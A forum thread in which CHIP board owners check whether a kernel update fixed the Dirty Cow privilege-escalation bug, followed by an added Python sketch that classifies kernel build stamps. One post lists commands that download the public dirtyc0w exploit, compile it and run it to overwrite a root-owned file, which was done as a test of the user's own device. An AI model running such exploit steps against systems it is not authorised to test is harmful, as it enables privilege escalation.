Dirty Cow patched yet?


#1

I just installed the following packages on a CHIP when I ran an update. Is this CHIP susceptible to the Dirty Cow bug or not?

chip-mali-modules-4.4.13-ntc-mlc chip-mconfigs linux-image-4.4.13-ntc-mlc rtl8723bs-mp-driver-modules-4.4.13-ntc-mlc


#2

I just checked the dirty cow bug and it is not resolved in the newest OS. I will have to do the patch then.

chip@chip1:~$ cat /proc/version
Linux version 4.4.13-ntc-mlc (bamboo@ip-172-31-30-80) (gcc version 5.2.1 20151010 (Ubuntu 5.2.1-22ubuntu1) ) #1 SMP Thu Nov 3 01:28:54 UTC 2016
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -lpthread dirtyc0w.c -o dirtyc0w
sudo bash
echo this is not a test > foo
exit
./dirtyc0w foo m00000000000000000
chip@chip1:~$ cat foo
m00000000000000000

https://bbs.nextthing.co/t/patch-for-linux-exploit-dirty-cow/11028/2?u=danjperron

In reality you need to be connected as a user on the CHIP for Dirty Cow. From my point of view I don’t think it is a big issue for C.H.I.P. because if a hacker gets user access on your C.H.I.P. he will use “sudo bash” instead. So change the default password!!! Very important!!!


#3

Thanks. Yeah, I change the root and user passwords as a matter of course on my NTC CHIPs and Raspberry Pis. Just a shame that Next Thing Co. is putting out kernel updates that DON’T yet have an update for Dirty Cow.


#4

If you do

sudo apt-get update
sudo apt-get upgrade

You will get the new kernel, which is the same version, but with the dirty cow patched.

https://bbs.nextthing.co/t/new-kernel-live-in-apt-repos-flashable-images-also-online/12963


#5

This is the line I could see before (Nov 3):
$ uname -a
Linux chip 4.4.13-ntc-mlc #1 SMP Thu Nov 3 01:28:54 UTC 2016 armv7l GNU/Linux

And now (Dec 6):
$ uname -a
Linux chip 4.4.13-ntc-mlc #1 SMP Tue Dec 6 21:38:00 UTC 2016 armv7l GNU/Linux


#6

Yeah, I’m getting the same output since the 6th as well for uname -a

Linux chip 4.4.13-ntc-mlc #1 SMP Tue Dec 6 21:38:00 UTC 2016 armv7l GNU/Linux

Is this the one that is supposed to be patched for Dirty Cow?


#7

Try it yourself:
https://www.redpacketsecurity.com/testing-dirty-cow-cve-2016-5195/


#8

@patrikg

You should have checked the post from 4 days ago.

I did test it and it is patched!


#9

Thanks, looks like I’m good as well. Didn’t know about the mentioned post from 4 days ago.
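
Added example, not part of the thread: because the patched and unpatched kernels share the release string 4.4.13-ntc-mlc, this sketch classifies a `uname -a` or `/proc/version` banner by its build stamp, using the Nov 3 and Dec 6 stamps quoted in the posts above. The names `build_info` and `classify` are hypothetical, and treating builds older than Nov 3 as unpatched and builds newer than Dec 6 as patched is an assumption.

```python
import re
from datetime import datetime

# From the thread: one release string, two build stamps.
RELEASE = "4.4.13-ntc-mlc"
VULNERABLE_BUILD = datetime(2016, 11, 3, 1, 28, 54)  # post #2: test file was overwritten
PATCHED_BUILD = datetime(2016, 12, 6, 21, 38, 0)     # posts #4/#8: reported patched
MONTHS = {name: num for num, name in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), start=1)}

# Handles both `uname -a` ("Linux <host> <release> #N ...") and
# /proc/version ("Linux version <release> (...) #N ...").
BUILD_RE = re.compile(
    r"(?:Linux version |Linux \S+ )(?P<release>\S+) .*?#\d+ (?:SMP )?(?:PREEMPT )?"
    r"\w{3} (?P<mon>\w{3}) +(?P<day>\d{1,2}) "
    r"(?P<h>\d{2}):(?P<mi>\d{2}):(?P<s>\d{2}) UTC (?P<year>\d{4})")


def build_info(line):
    """Return (release, build datetime) from a kernel banner, or None."""
    m = BUILD_RE.search(line)
    if not m or m["mon"] not in MONTHS:
        return None
    built = datetime(int(m["year"]), MONTHS[m["mon"]], int(m["day"]),
                     int(m["h"]), int(m["mi"]), int(m["s"]))
    return m["release"], built


def classify(line):
    """Classify one banner line against the two builds named in the thread."""
    info = build_info(line)
    if info is None:
        return "unparsed"
    release, built = info
    if release != RELEASE:
        return "other-kernel"      # out of scope for this thread
    if built >= PATCHED_BUILD:
        return "patched-build"     # assumption: later builds keep the fix
    if built <= VULNERABLE_BUILD:
        return "vulnerable-build"  # assumption: older builds lack it too
    return "unknown-build"         # between the two stamps: test it


if __name__ == "__main__":
    for banner in (
        "Linux chip 4.4.13-ntc-mlc #1 SMP Thu Nov 3 01:28:54 UTC 2016 armv7l GNU/Linux",
        "Linux chip 4.4.13-ntc-mlc #1 SMP Tue Dec 6 21:38:00 UTC 2016 armv7l GNU/Linux",
    ):
        print(classify(banner), "<-", banner)
```

A result of unknown-build or other-kernel means the build stamp alone cannot settle the question for that device.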